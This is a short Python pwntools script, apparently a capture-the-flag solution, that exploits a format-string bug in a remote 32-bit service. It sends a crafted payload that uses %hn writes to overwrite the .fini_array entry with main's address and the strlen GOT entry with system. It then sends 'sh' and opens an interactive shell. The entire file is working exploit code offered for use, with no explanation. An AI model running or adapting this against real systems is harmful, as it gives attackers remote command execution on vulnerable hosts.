from pwn import *

p = remote("172.20.10.5",1234)

payload = ""
payload += "AA"
payload += "\x36\x99\x04\x08" #.fini_array +2
payload += "\x56\x9a\x04\x08" #strlen got +2
payload += "\x54\x9a\x04\x08" #strlen got
payload += "\x34\x99\x04\x08" #.fini_array
payload += "%"+str(int(0x0804)-36)+"x"+"%12$hn"+"%13$hn" #writing the top of both directions 0x0804
payload += "%"+str(int(0x8490)-int(0x0804))+"x"+"%14$hn" #writing of the lower part of strlen overwriting with the lower part of system
payload += "%"+str(int(0x85ed)-int(0x8490))+"x"+"%15$hn" #writing of the lower part of .fini_array overwriting with the lower part of main
p.sendline(payload)
p.recvuntil("... ")
p.sendline("sh")
p.interactive()
